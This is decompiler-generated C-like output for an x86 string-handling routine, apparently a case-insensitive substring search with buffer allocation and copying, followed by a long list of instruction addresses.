				unsigned int _t377;
				signed int _t379;
				intOrPtr _t381;
				signed int _t385;
				signed int _t386;
				signed char* _t392;
				signed int _t393;
				signed int _t395;
				signed int _t401;
				signed int _t402;
				unsigned int _t408;
				signed int _t410;
				void* _t411;
				signed int _t417;
				signed int _t421;
				signed int _t427;
				signed int _t428;
				void* _t431;

				_v56 = 0;
				_t286 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t372 = E008A1030();
				_t431 = (_t428 & 0xfffffff0) - 0x34 + 4;
				_t210 = _v56;
				if(_t210 == 0) {
					 *_t372 = 0;
				} else {
					if(_t372 != 0) {
						_t368 =  *_t210;
						 *_t372 = _t368;
						if(_t368 != 0) {
							_t319 = 0;
							while(1) {
								_t319 = _t319 + 1;
								_t369 =  *((char*)(_t210 + _t319 * 2 - 1));
								 *((char*)(_t372 + _t319 * 2 - 1)) = _t369;
								if(_t369 == 0) {
									goto L6;
								}
								_t370 =  *((char*)(_t210 + _t319 * 2));
								 *((char*)(_t372 + _t319 * 2)) = _t370;
								if(_t370 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(1);
					_push(_t210);
					E008A10B0();
					_t431 = _t431 + 8;
				}
				_t211 = _a8;
				_v52 = 0x40;
				_v56 = _t372;
				if(_t211 != 0) {
					__eflags = _t372;
					if(_t372 == 0) {
						_t302 = 0x40;
						_t401 = 0;
					} else {
						_t366 = _t372 & 0x0000000f;
						__eflags = _t366;
						if(_t366 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t427 =  ~( ~_t366 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t427;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t211;
								if(_t211 != 0) {
									break;
								}
								_t366 = _t366 + 0x10;
								__eflags = _t366 - _t427;
								if(_t366 < _t427) {
									continue;
								} else {
									__eflags = _t427 - 0x7fffffff;
									if(_t427 >= 0x7fffffff) {
										L21:
										_t302 = 0x40;
										_t401 = 0x7fffffff;
									} else {
										while(1) {
											__eflags =  *((char*)(_t427 + _t372));
											if( *((char*)(_t427 + _t372)) == 0) {
												goto L174;
											}
											_t427 = _t427 + 1;
											__eflags = _t427 - 0x7fffffff;
											if(_t427 < 0x7fffffff) {
												continue;
											} else {
												goto L21;
											}
											goto L22;
										}
										goto L174;
									}
								}
								goto L22;
							}
							asm("bsf esi, eax");
							_t401 = _t427 + _t366;
							goto L174;
						} else {
							_t401 = 0;
							_t366 =  ~_t366 + 0x10;
							__eflags = _t366;
							while(1) {
								__eflags =  *((char*)(_t401 + _t372));
								if( *((char*)(_t401 + _t372)) == 0) {
									break;
								}
								_t401 = _t401 + 1;
								__eflags = _t401 - _t366;
								if(_t401 < _t366) {
									continue;
								} else {
									goto L15;
								}
								goto L22;
							}
							L174:
							__eflags = _t401 - 0xfffffffe;
							if(_t401 != 0xfffffffe) {
								_t302 = 0x40;
							} else {
								 *_t372 = 0;
								_t302 = _v52;
							}
						}
					}
					L22:
					_t20 = _t401 + 2; // 0x80000001
					_t320 = _t20;
					__eflags = _t320 - 0x40;
					_t321 =  <=  ? 0x40 : _t320;
					__eflags = _t302 - _t321;
					if(_t302 < _t321) {
						_t377 = (_t321 >> 5 >> 0x1a) + _t321 >> 6;
						_t322 = _t321 & 0x8000003f;
						__eflags = _t322;
						if(_t322 < 0) {
							_t322 = (_t322 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t322;
						}
						__eflags = _t322;
						_t379 = _t377 + (0 | _t322 > 0x00000000) << 6;
						_push(_t379);
						_t303 = E008A1030();
						_t431 = _t431 + 4;
						_t323 = _v56;
						__eflags = _t323;
						if(_t323 == 0) {
							 *_t303 = 0;
						} else {
							__eflags = _t303;
							if(_t303 != 0) {
								_t282 =  *_t323;
								 *_t303 = _t282;
								__eflags = _t282;
								if(_t282 != 0) {
									_v60 = _t379;
									_t283 = 0;
									__eflags = 0;
									_v64 = _t401;
									_v68 = _t286;
									while(1) {
										_t283 = _t283 + 1;
										_t299 =  *((char*)(_t323 + _t283 * 2 - 1));
										 *(_t303 + _t283 * 2 - 1) = _t299;
										__eflags = _t299;
										if(_t299 == 0) {
											break;
										}
										_t300 =  *((char*)(_t323 + _t283 * 2));
										 *(_t303 + _t283 * 2) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											continue;
										}
										break;
									}
									_t379 = _v60;
									_t401 = _v64;
									_t286 = _v68;
								}
							}
							_push(1);
							_push(_t323);
							_v68 = _t303;
							E008A10B0();
							_t303 = _v68;
							_t431 = _t431 + 8;
						}
						_v52 = _t379;
						_v56 = _t303;
					} else {
						_t303 = _v56;
					}
					 *((char*)(_t303 + _t401)) = _a8;
					_t217 =  &_v56;
					 *((char*)(_t401 +  *_t217 + 1)) = 0;
				} else {
					_t217 =  &_v56;
				}
				_t402 =  *_t217;
				if(_t402 == 0) {
					L39:
					_t325 = _a4;
					_push(0x40);
					 *_t325 = 0;
					 *((intOrPtr*)(_t325 + 4)) = 0;
					_t287 = E008A1030();
					_t431 = _t431 + 4;
					_t221 =  *_a4;
					if(_t221 == 0) {
						 *_t287 = 0;
					} else {
						if(_t287 != 0) {
							_t326 =  *_t221;
							 *_t287 = _t326;
							if(_t326 != 0) {
								_t327 = 0;
								while(1) {
									_t327 = _t327 + 1;
									_t304 =  *((char*)(_t221 + _t327 * 2 - 1));
									 *((char*)(_t287 + _t327 * 2 - 1)) = _t304;
									if(_t304 == 0) {
										goto L45;
									}
									_t305 =  *((char*)(_t221 + _t327 * 2));
									 *((char*)(_t287 + _t327 * 2)) = _t305;
									if(_t305 != 0) {
										continue;
									}
									goto L45;
								}
							}
						}
						L45:
						_push(1);
						_push(_t221);
						E008A10B0();
						_t431 = _t431 + 8;
					}
					goto L124;
				} else {
					_t227 =  *_t402;
					_v40 = _t227;
					if(_t227 != 0) {
						_v64 =  *_t286;
						_t307 = E008B5A90( *_t286, _t402);
						__eflags = _t307;
						if(_t307 == 0) {
							_t329 = _a4;
							_push(0x40);
							 *_t329 = 0;
							 *((intOrPtr*)(_t329 + 4)) = 0;
							_t287 = E008A1030();
							_t431 = _t431 + 4;
							_t232 =  *_a4;
							__eflags = _t232;
							if(_t232 == 0) {
								 *_t287 = 0;
							} else {
								__eflags = _t287;
								if(_t287 != 0) {
									_t330 =  *_t232;
									 *_t287 = _t330;
									__eflags = _t330;
									if(_t330 != 0) {
										_t331 = 0;
										__eflags = 0;
										while(1) {
											_t331 = _t331 + 1;
											_t308 =  *((char*)(_t232 + _t331 * 2 - 1));
											 *(_t287 + _t331 * 2 - 1) = _t308;
											__eflags = _t308;
											if(_t308 == 0) {
												goto L172;
											}
											_t309 =  *((char*)(_t232 + _t331 * 2));
											 *(_t287 + _t331 * 2) = _t309;
											__eflags = _t309;
											if(_t309 != 0) {
												continue;
											}
											goto L172;
										}
									}
								}
								L172:
								_push(1);
								_push(_t232);
								E008A10B0();
								_t431 = _t431 + 8;
							}
							goto L124;
						} else {
							_t381 = _v40;
							_t235 = _t402 & 0x0000000f;
							_v36 = _t235;
							asm("pxor xmm0, xmm0");
							_v20 = _t402;
							_v44 = _t381 - 0x41;
							_v24 =  ~_t235 + 0x10;
							_v48 = _t381 + 0x20;
							_t333 = 0;
							__eflags = 0;
							while(1) {
								L49:
								_t385 = _t307;
								_t291 = _t307 + 1;
								__eflags = _t291;
								if(_t291 == 0) {
									break;
								}
								__eflags =  *(_t307 + 1);
								if( *(_t307 + 1) != 0) {
									__eflags = _v44 - 0x19;
									_t411 = _t333;
									_t268 =  <=  ? _v48 : _v40;
									_t269 =  <=  ? _v48 : _v40;
									_v60 = _t385;
									_v28 =  <=  ? _v48 : _v40;
									while(1) {
										_t411 = _t411 + 1;
										_t291 = _t291 + 1;
										_t392 = _t307 + _t411;
										_v32 = _t392;
										_t393 =  *_t392 & 0x000000ff;
										__eflags =  *((char*)(_t291 - 1)) + 0xffffffbf - 0x19;
										_t394 =  <=  ? _t393 + 0x20 : _t393;
										_t272 =  <=  ? _t393 + 0x20 : _t393;
										__eflags = ( <=  ? _t393 + 0x20 : _t393) - _v28;
										if(( <=  ? _t393 + 0x20 : _t393) == _v28) {
											break;
										}
										__eflags =  *_t291;
										if( *_t291 != 0) {
											continue;
										} else {
											L54:
											_t385 = _v60;
										}
										goto L55;
									}
									_t307 = _v32;
									_t355 = _v36;
									_t273 = _v24;
									do {
										_t395 = _t355;
										__eflags = _t355;
										if(_t355 == 0) {
											L136:
											_v24 = _t273;
											_t417 =  ~( ~_t395 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											__eflags = _t417;
											_t274 = _v20;
											while(1) {
												asm("movdqu xmm1, [eax+edi]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb ebx, xmm1");
												__eflags = _t291;
												if(_t291 != 0) {
													break;
												}
												_t395 = _t395 + 0x10;
												__eflags = _t395 - _t417;
												if(_t395 < _t417) {
													continue;
												} else {
													_v20 = _t274;
													_t275 = _v24;
													__eflags = _t417 - 0x7fffffff;
													if(_t417 >= 0x7fffffff) {
														goto L144;
													} else {
														_t291 = _v20;
														while(1) {
															__eflags =  *((char*)(_t417 + _t291));
															if( *((char*)(_t417 + _t291)) == 0) {
																goto L161;
															}
															_t417 = _t417 + 1;
															__eflags = _t417 - 0x7fffffff;
															if(_t417 < 0x7fffffff) {
																continue;
															} else {
																_v20 = _t291;
																goto L144;
															}
															goto L179;
														}
														goto L161;
													}
												}
												goto L179;
											}
											asm("bsf esi, ebx");
											_v20 = _t274;
											_t417 = _t417 + _t395;
											_t275 = _v24;
											goto L162;
										} else {
											_t291 = _v20;
											_t395 = _t273;
											_t417 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((char*)(_t417 + _t291));
												if( *((char*)(_t417 + _t291)) == 0) {
													break;
												}
												_t417 = _t417 + 1;
												__eflags = _t417 - _t273;
												if(_t417 < _t273) {
													continue;
												} else {
													_v20 = _t291;
													goto L136;
												}
												goto L179;
											}
											L161:
											_v20 = _t291;
											L162:
											__eflags = _t417;
											if(__eflags == 0) {
												L144:
												_t417 = 0x7fffffff;
												goto L145;
											} else {
												if(__eflags > 0) {
													L145:
													_v68 = _t417;
													_t296 = 0;
													__eflags = 0;
													_v36 = _t355;
													_v24 = _t275;
													while(1) {
														_t276 =  *((char*)(_t296 + _t307));
														_t357 =  *((char*)(_t296 + _v20));
														__eflags = _t276 - 0x61 - 0x19;
														_t277 =  <=  ? _t276 - 0x20 : _t276;
														__eflags = _t357 - 0x61 - 0x19;
														_t278 =  <=  ? _t276 - 0x20 : _t276;
														_t358 =  <=  ? _t357 - 0x20 : _t357;
														_t359 =  <=  ? _t357 - 0x20 : _t357;
														__eflags = _t278 - ( <=  ? _t357 - 0x20 : _t357);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t278;
														if(_t278 == 0) {
															L150:
															asm("o16 nop [eax+eax]");
															_t385 = _v60;
															_t333 = 0;
															__eflags = 0;
															goto L151;
														} else {
															_t296 = _t296 + 1;
															__eflags = _t296 - _v68;
															if(_t296 < _v68) {
																continue;
															} else {
																goto L150;
															}
														}
														goto L179;
													}
													_t360 = _v36;
													_t279 = _v24;
													_t421 = _t307 + 1;
													__eflags = _t421;
													if(_t421 == 0) {
														goto L54;
													} else {
														__eflags = _v44 - 0x19;
														_t298 =  <=  ? _v48 : _v40;
														_t291 =  <=  ? _v48 : _v40;
														__eflags =  *(_t307 + 1);
														if( *(_t307 + 1) == 0) {
															goto L54;
														} else {
															_v36 = _t360;
															_v24 = _t279;
															while(1) {
																_t307 = _t307 + 1;
																_t421 = _t421 + 1;
																_t361 =  *_t307 & 0x000000ff;
																__eflags =  *((char*)(_t421 - 1)) + 0xffffffbf - 0x19;
																_t362 =  <=  ? _t361 + 0x20 : _t361;
																__eflags = ( <=  ? _t361 + 0x20 : _t361) - _t291;
																if(( <=  ? _t361 + 0x20 : _t361) == _t291) {
																	goto L159;
																}
																__eflags =  *_t421;
																if( *_t421 != 0) {
																	continue;
																} else {
																	goto L54;
																}
																goto L179;
															}
															goto L159;
														}
													}
												} else {
													_v36 = _t355;
													_t333 = 0;
													_v24 = _t273;
													_t385 = _v60;
													L151:
													__eflags = _t307;
													if(_t307 != 0) {
														goto L49;
													} else {
														goto L55;
													}
												}
											}
										}
										L179:
										L159:
										_t355 = _v36;
										_t273 = _v24;
										__eflags = _t307;
									} while (_t307 != 0);
									goto L54;
								}
								break;
							}
							L55:
							_t386 = _t385 - _v64;
							__eflags = _t386;
							if(_t386 != 0) {
								__eflags = _v64;
								if(_v64 == 0) {
									_t334 = 0;
								} else {
									_t259 = _v64 & 0x0000000f;
									__eflags = _t259;
									if(_t259 == 0) {
										L69:
										_t334 =  ~( ~_t259 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										__eflags = _t334;
										while(1) {
											asm("movdqu xmm1, [ebx+eax]");
											asm("pcmpeqb xmm1, xmm0");
											asm("pmovmskb ecx, xmm1");
											__eflags = _t307;
											if(_t307 != 0) {
												break;
											}
											_t259 = _t259 + 0x10;
											__eflags = _t259 - _t334;
											if(_t259 < _t334) {
												continue;
											} else {
												__eflags = _t334 - 0x7fffffff;
												if(_t334 >= 0x7fffffff) {
													L76:
													_t334 = 0x7fffffff;
												} else {
													_t260 = _v64;
													while(1) {
														__eflags =  *((char*)(_t334 + _t260));
														if( *((char*)(_t334 + _t260)) == 0) {
															goto L77;
														}
														_t334 = _t334 + 1;
														__eflags = _t334 - 0x7fffffff;
														if(_t334 < 0x7fffffff) {
															continue;
														} else {
															goto L76;
														}
														goto L77;
													}
												}
											}
											goto L77;
										}
										asm("bsf edx, ecx");
										_t334 = _t334 + _t259;
									} else {
										_t334 = 0;
										_t307 = _v64;
										_t259 =  ~_t259 + 0x10;
										__eflags = _t259;
										while(1) {
											__eflags =  *((char*)(_t334 + _t307));
											if( *((char*)(_t334 + _t307)) == 0) {
												goto L77;
											}
											_t334 = _t334 + 1;
											__eflags = _t334 - _t259;
											if(_t334 < _t259) {
												continue;
											} else {
												goto L69;
											}
											goto L77;
										}
									}
								}
								L77:
								_t312 = _t334 >> 0x0000001f & _t334;
								_t335 = _t334 - _t312;
								__eflags = _t386;
								if(_t386 < 0) {
									L79:
									_t386 = _t335;
								} else {
									__eflags = _t386 - _t335;
									if(_t386 > _t335) {
										goto L79;
									}
								}
								_t336 = _a4;
								 *_t336 = 0;
								 *((intOrPtr*)(_t336 + 4)) = 0;
								_t293 = _t312 + _v64;
								__eflags = _t293;
								if(_t293 == 0) {
									L116:
									_push(0x40);
									_t287 = E008A1030();
									_t431 = _t431 + 4;
									_t239 =  *_a4;
									__eflags = _t239;
									if(_t239 == 0) {
										 *_t287 = 0;
									} else {
										__eflags = _t287;
										if(_t287 != 0) {
											_t337 =  *_t239;
											 *_t287 = _t337;
											__eflags = _t337;
											if(_t337 != 0) {
												_t338 = 0;
												__eflags = 0;
												while(1) {
													_t338 = _t338 + 1;
													_t313 =  *((char*)(_t239 + _t338 * 2 - 1));
													 *(_t287 + _t338 * 2 - 1) = _t313;
													__eflags = _t313;
													if(_t313 == 0) {
														goto L122;
													}
													_t314 =  *((char*)(_t239 + _t338 * 2));
													 *(_t287 + _t338 * 2) = _t314;
													__eflags = _t314;
													if(_t314 != 0) {
														continue;
													}
													goto L122;
												}
											}
										}
										L122:
										_push(1);
										_push(_t239);
										E008A10B0();
										_t431 = _t431 + 8;
									}
									goto L124;
								} else {
									_t241 = _v64;
									__eflags =  *(_t241 + _t312);
									if( *(_t241 + _t312) == 0) {
										goto L116;
									} else {
										__eflags = _t386;
										if(_t386 == 0) {
											_t254 = _t241 + _t312;
											_v64 = _t254;
											_t255 = _t254 & 0x0000000f;
											__eflags = _t255;
											if(_t255 == 0) {
												L87:
												_t386 =  ~( ~_t255 + 0x0000000f & 0x0000000f) + 0x7fffffff;
												__eflags = _t386;
												while(1) {
													asm("movdqu xmm1, [ecx+eax]");
													asm("pcmpeqb xmm1, xmm0");
													asm("pmovmskb edx, xmm1");
													__eflags = _t336;
													if(_t336 != 0) {
														break;
													}
													_t255 = _t255 + 0x10;
													__eflags = _t255 - _t386;
													if(_t255 < _t386) {
														continue;
													} else {
														__eflags = _t386 - 0x7fffffff;
														if(_t386 >= 0x7fffffff) {
															L94:
															_t386 = 0x7fffffff;
														} else {
															_t256 = _v64;
															while(1) {
																__eflags =  *((char*)(_t386 + _t256));
																if( *((char*)(_t386 + _t256)) == 0) {
																	goto L95;
																}
																_t386 = _t386 + 1;
																__eflags = _t386 - 0x7fffffff;
																if(_t386 < 0x7fffffff) {
																	continue;
																} else {
																	goto L94;
																}
																goto L95;
															}
														}
													}
													goto L95;
												}
												asm("bsf edi, edx");
												_t386 = _t386 + _t255;
											} else {
												_t386 = 0;
												_t336 = _v64;
												_t255 =  ~_t255 + 0x10;
												__eflags = _t255;
												while(1) {
													__eflags =  *((char*)(_t386 + _t336));
													if( *((char*)(_t386 + _t336)) == 0) {
														goto L95;
													}
													_t386 = _t386 + 1;
													__eflags = _t386 - _t255;
													if(_t386 < _t255) {
														continue;
													} else {
														goto L87;
													}
													goto L95;
												}
											}
										}
										L95:
										_t115 = _t386 + 1; // -2147483661
										_t339 = _t115;
										__eflags = _t339 - 0x40;
										_t340 =  <=  ? 0x40 : _t339;
										__eflags = _t340;
										if(_t340 > 0) {
											_t408 = (_t340 >> 5 >> 0x1a) + _t340 >> 6;
											_t341 = _t340 & 0x8000003f;
											__eflags = _t341;
											if(_t341 < 0) {
												_t341 = (_t341 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t341;
											}
											__eflags = _t341;
											_t410 = _t408 + (0 | _t341 > 0x00000000) << 6;
											_push(_t410);
											_t315 = E008A1030();
											_t431 = _t431 + 4;
											_t342 =  *_a4;
											__eflags = _t342;
											if(_t342 == 0) {
												 *_t315 = 0;
											} else {
												__eflags = _t315;
												if(_t315 != 0) {
													_t250 =  *_t342;
													 *_t315 = _t250;
													__eflags = _t250;
													if(_t250 != 0) {
														__eflags = 0;
														_v60 = _t386;
														_v68 = _t293;
														_t294 = 0;
														while(1) {
															_t294 = _t294 + 1;
															_t252 =  *((char*)(_t342 + _t294 * 2 - 1));
															 *(_t315 + _t294 * 2 - 1) = _t252;
															__eflags = _t252;
															if(_t252 == 0) {
																break;
															}
															_t253 =  *((char*)(_t342 + _t294 * 2));
															 *(_t315 + _t294 * 2) = _t253;
															__eflags = _t253;
															if(_t253 != 0) {
																continue;
															}
															break;
														}
														_t386 = _v60;
														_t293 = _v68;
													}
												}
												_push(1);
												_push(_t342);
												_v68 = _t315;
												E008A10B0();
												_t315 = _v68;
												_t431 = _t431 + 8;
											}
											_t247 = _a4;
											_t247[1] = _t410;
											 *_t247 = _t315;
										} else {
											_t315 = 0;
										}
										__eflags = _t315;
										if(_t315 != 0) {
											_t343 = 0;
											while(1) {
												_t248 =  *_t293;
												_t343 = _t343 + 1;
												 *_t315 = _t248;
												__eflags = _t386;
												if(_t386 == 0) {
													goto L114;
												}
												__eflags = _t343 - _t386;
												if(_t343 == _t386) {
													 *(_t315 + 1) = 0;
												} else {
													goto L114;
												}
												goto L125;
												L114:
												__eflags = _t248;
												if(_t248 != 0) {
													_t315 = _t315 + 1;
													_t293 = _t293 + 1;
													__eflags = _t293;
													continue;
												}
												goto L125;
											}
										}
									}
								}
							} else {
								_t351 = _a4;
								_push(0x40);
								 *_t351 = 0;
								 *((intOrPtr*)(_t351 + 4)) = 0;
								_t287 = E008A1030();
								_t431 = _t431 + 4;
								_t265 =  *_a4;
								__eflags = _t265;
								if(_t265 == 0) {
									 *_t287 = 0;
								} else {
									__eflags = _t287;
									if(_t287 != 0) {
										_t352 =  *_t265;
										 *_t287 = _t352;
										__eflags = _t352;
										if(_t352 != 0) {
											_t353 = 0;
											__eflags = 0;
											while(1) {
												_t353 = _t353 + 1;
												_t317 =  *((char*)(_t265 + _t353 * 2 - 1));
												 *(_t287 + _t353 * 2 - 1) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													goto L62;
												}
												_t318 =  *((char*)(_t265 + _t353 * 2));
												 *(_t287 + _t353 * 2) = _t318;
												__eflags = _t318;
												if(_t318 != 0) {
													continue;
												}
												goto L62;
											}
										}
									}
									L62:
									_push(1);
									_push(_t265);
									E008A10B0();
									_t431 = _t431 + 8;
								}
								L124:
								_t222 = _a4;
								 *_t222 = _t287;
								_t222[1] = 0x40;
							}
						}
					} else {
						goto L39;
					}
				}
				L125:
				_push(1);
				_push(_v56);
				E008A10B0();
				_v56 = 0;
				_v52 = 0;
				return _a4;
				goto L179;
			}

0x008b1ebe
0x008b1ec2
0x008b1ec4
0x008b1ec8
0x008b1ecf
0x008b1ed1
0x008b1ed4
0x008b1eda
0x008b1f11
0x008b1edc
0x008b1ede
0x008b1ee0
0x008b1ee3
0x008b1ee7
0x008b1ee9
0x008b1eeb
0x008b1eeb
0x008b1eec
0x008b1ef1
0x008b1ef7
0x00000000
0x00000000
0x008b1ef9
0x008b1efd
0x008b1f02
0x00000000
0x00000000
0x00000000
0x008b1f02
0x008b1eeb
0x008b1ee7
0x008b1f04
0x008b1f04
0x008b1f06
0x008b1f07
0x008b1f0c
0x008b1f0c
0x008b1f14
0x008b1f18
0x008b1f20
0x008b1f26
0x008b1f31
0x008b1f33
0x008b269a
0x008b269f
0x008b1f39
0x008b1f3b
0x008b1f3b
0x008b1f3e
0x008b1f56
0x008b1f5a
0x008b1f66
0x008b1f66
0x008b1f6c
0x008b1f6c
0x008b1f71
0x008b1f75
0x008b1f79
0x008b1f7b
0x00000000
0x00000000
0x008b1f81
0x008b1f84
0x008b1f86
0x00000000
0x008b1f88
0x008b1f88
0x008b1f8e
0x008b1fa3
0x008b1fa3
0x008b1fa8
0x008b1f90
0x008b1f90
0x008b1f90
0x008b1f94
0x00000000
0x00000000
0x008b1f9a
0x008b1f9b
0x008b1fa1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b1fa1
0x00000000
0x008b1f90
0x008b1f8e
0x00000000
0x008b1f86
0x008b2693
0x008b2696
0x00000000
0x008b1f40
0x008b1f42
0x008b1f44
0x008b1f44
0x008b1f47
0x008b1f47
0x008b1f4b
0x00000000
0x00000000
0x008b1f51
0x008b1f52
0x008b1f54
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b1f54
0x008b2678
0x008b2678
0x008b267b
0x008b2689
0x008b267d
0x008b267d
0x008b2680
0x008b2680
0x008b267b
0x008b1f3e
0x008b1fad
0x008b1fb2
0x008b1fb2
0x008b1fb5
0x008b1fb8
0x008b1fbb
0x008b1fbd
0x008b1fd2
0x008b1fd5
0x008b1fd5
0x008b1fdb
0x008b1fe3
0x008b1fe3
0x008b1fe3
0x008b1fe6
0x008b1fed
0x008b1ff0
0x008b1ff6
0x008b1ff8
0x008b1ffb
0x008b1fff
0x008b2001
0x008b2056
0x008b2003
0x008b2003
0x008b2005
0x008b2007
0x008b200a
0x008b200c
0x008b200e
0x008b2010
0x008b2014
0x008b2014
0x008b2016
0x008b201a
0x008b201d
0x008b201d
0x008b201e
0x008b2023
0x008b2027
0x008b2029
0x00000000
0x00000000
0x008b202b
0x008b202f
0x008b2032
0x008b2034
0x00000000
0x00000000
0x00000000
0x008b2034
0x008b2036
0x008b203a
0x008b203e
0x008b203e
0x008b200e
0x008b2041
0x008b2043
0x008b2044
0x008b2048
0x008b204d
0x008b2051
0x008b2051
0x008b2059
0x008b205d
0x008b1fbf
0x008b1fbf
0x008b1fbf
0x008b2065
0x008b2068
0x008b206e
0x008b1f28
0x008b1f28
0x008b1f28
0x008b2073
0x008b2077
0x008b2084
0x008b2084
0x008b2089
0x008b208b
0x008b208d
0x008b2095
0x008b2097
0x008b209d
0x008b20a1
0x008b20db
0x008b20a3
0x008b20a5
0x008b20a7
0x008b20aa
0x008b20ae
0x008b20b0
0x008b20b2
0x008b20b2
0x008b20b3
0x008b20b8
0x008b20be
0x00000000
0x00000000
0x008b20c0
0x008b20c4
0x008b20c9
0x00000000
0x00000000
0x00000000
0x008b20c9
0x008b20b2
0x008b20ae
0x008b20cb
0x008b20cb
0x008b20cd
0x008b20ce
0x008b20d3
0x008b20d3
0x00000000
0x008b2079
0x008b2079
0x008b207c
0x008b2082
0x008b20e7
0x008b20f0
0x008b20f2
0x008b20f4
0x008b2619
0x008b261e
0x008b2620
0x008b2622
0x008b262a
0x008b262c
0x008b2632
0x008b2634
0x008b2636
0x008b2670
0x008b2638
0x008b2638
0x008b263a
0x008b263c
0x008b263f
0x008b2641
0x008b2643
0x008b2645
0x008b2645
0x008b2647
0x008b2647
0x008b2648
0x008b264d
0x008b2651
0x008b2653
0x00000000
0x00000000
0x008b2655
0x008b2659
0x008b265c
0x008b265e
0x00000000
0x00000000
0x00000000
0x008b265e
0x008b2647
0x008b2643
0x008b2660
0x008b2660
0x008b2662
0x008b2663
0x008b2668
0x008b2668
0x00000000
0x008b20fa
0x008b20fa
0x008b2100
0x008b2103
0x008b2107
0x008b210b
0x008b2112
0x008b2120
0x008b2124
0x008b2128
0x008b2128
0x008b212a
0x008b212a
0x008b212c
0x008b212e
0x008b212e
0x008b212f
0x00000000
0x00000000
0x008b2131
0x008b2135
0x008b2137
0x008b213c
0x008b2142
0x008b2147
0x008b214a
0x008b214e
0x008b2152
0x008b2152
0x008b2153
0x008b2158
0x008b215b
0x008b2162
0x008b2165
0x008b216b
0x008b216e
0x008b2170
0x008b2174
0x00000000
0x00000000
0x008b217a
0x008b217d
0x00000000
0x008b217f
0x008b217f
0x008b217f
0x008b217f
0x00000000
0x008b217d
0x008b2482
0x008b2486
0x008b248a
0x008b248e
0x008b248e
0x008b2490
0x008b2492
0x008b24af
0x008b24bb
0x008b24bf
0x008b24bf
0x008b24c5
0x008b24c9
0x008b24c9
0x008b24ce
0x008b24d2
0x008b24d6
0x008b24d8
0x00000000
0x00000000
0x008b24de
0x008b24e1
0x008b24e3
0x00000000
0x008b24e5
0x008b24e5
0x008b24e9
0x008b24ed
0x008b24f3
0x00000000
0x008b24f5
0x008b24f5
0x008b24f9
0x008b24f9
0x008b24fd
0x00000000
0x00000000
0x008b2503
0x008b2504
0x008b250a
0x00000000
0x008b250c
0x008b250c
0x00000000
0x008b250c
0x00000000
0x008b250a
0x00000000
0x008b24f9
0x008b24f3
0x00000000
0x008b24e3
0x008b260a
0x008b260d
0x008b2611
0x008b2613
0x00000000
0x008b2494
0x008b2494
0x008b2498
0x008b249a
0x008b249a
0x008b249c
0x008b249c
0x008b24a0
0x00000000
0x00000000
0x008b24a6
0x008b24a7
0x008b24a9
0x00000000
0x008b24ab
0x008b24ab
0x00000000
0x008b24ab
0x00000000
0x008b24a9
0x008b25e5
0x008b25e5
0x008b25e9
0x008b25e9
0x008b25eb
0x008b2510
0x008b2510
0x00000000
0x008b25f1
0x008b25f1
0x008b2515
0x008b2515
0x008b2518
0x008b2518
0x008b251a
0x008b251e
0x008b2522
0x008b2526
0x008b252a
0x008b2531
0x008b253a
0x008b253d
0x008b2540
0x008b2546
0x008b2549
0x008b254c
0x008b254e
0x00000000
0x00000000
0x008b2552
0x008b2554
0x008b255c
0x008b255c
0x008b2562
0x008b2566
0x008b2566
0x00000000
0x008b2556
0x008b2556
0x008b2557
0x008b255a
0x00000000
0x00000000
0x00000000
0x00000000
0x008b255a
0x00000000
0x008b2554
0x008b2575
0x008b2579
0x008b257f
0x008b257f
0x008b2580
0x00000000
0x008b2586
0x008b2586
0x008b258f
0x008b2594
0x008b2597
0x008b259b
0x00000000
0x008b25a1
0x008b25a1
0x008b25a5
0x008b25a9
0x008b25a9
0x008b25aa
0x008b25ab
0x008b25b5
0x008b25bb
0x008b25be
0x008b25c0
0x00000000
0x00000000
0x008b25c2
0x008b25c5
0x00000000
0x008b25c7
0x00000000
0x008b25c7
0x00000000
0x008b25c5
0x00000000
0x008b25a9
0x008b259b
0x008b25f7
0x008b25f7
0x008b25fb
0x008b25fd
0x008b2601
0x008b2568
0x008b2568
0x008b256a
0x00000000
0x008b2570
0x00000000
0x008b2570
0x008b256a
0x008b25f1
0x008b25eb
0x00000000
0x008b25d0
0x008b25d0
0x008b25d4
0x008b25d8
0x008b25d8
0x00000000
0x008b25e0
0x00000000
0x008b2135
0x008b2183
0x008b2183
0x008b2183
0x008b2187
0x008b21e8
0x008b21ed
0x008b247b
0x008b21f3
0x008b21f7
0x008b21f7
0x008b21fa
0x008b2212
0x008b2222
0x008b2222
0x008b2228
0x008b2228
0x008b222d
0x008b2231
0x008b2235
0x008b2237
0x00000000
0x00000000
0x008b223d
0x008b2240
0x008b2242
0x00000000
0x008b2244
0x008b2244
0x008b224a
0x008b225f
0x008b225f
0x008b224c
0x008b224c
0x008b2250
0x008b2250
0x008b2254
0x00000000
0x00000000
0x008b2256
0x008b2257
0x008b225d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b225d
0x008b2250
0x008b224a
0x00000000
0x008b2242
0x008b2471
0x008b2474
0x008b21fc
0x008b21fe
0x008b2200
0x008b2204
0x008b2204
0x008b2207
0x008b2207
0x008b220b
0x00000000
0x00000000
0x008b220d
0x008b220e
0x008b2210
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b2210
0x008b2207
0x008b21fa
0x008b2264
0x008b2269
0x008b226b
0x008b226d
0x008b226f
0x008b2275
0x008b2275
0x008b2271
0x008b2271
0x008b2273
0x00000000
0x00000000
0x008b2273
0x008b2277
0x008b227e
0x008b2280
0x008b2283
0x008b2283
0x008b2287
0x008b23e1
0x008b23e1
0x008b23e8
0x008b23ea
0x008b23f0
0x008b23f2
0x008b23f4
0x008b242b
0x008b23f6
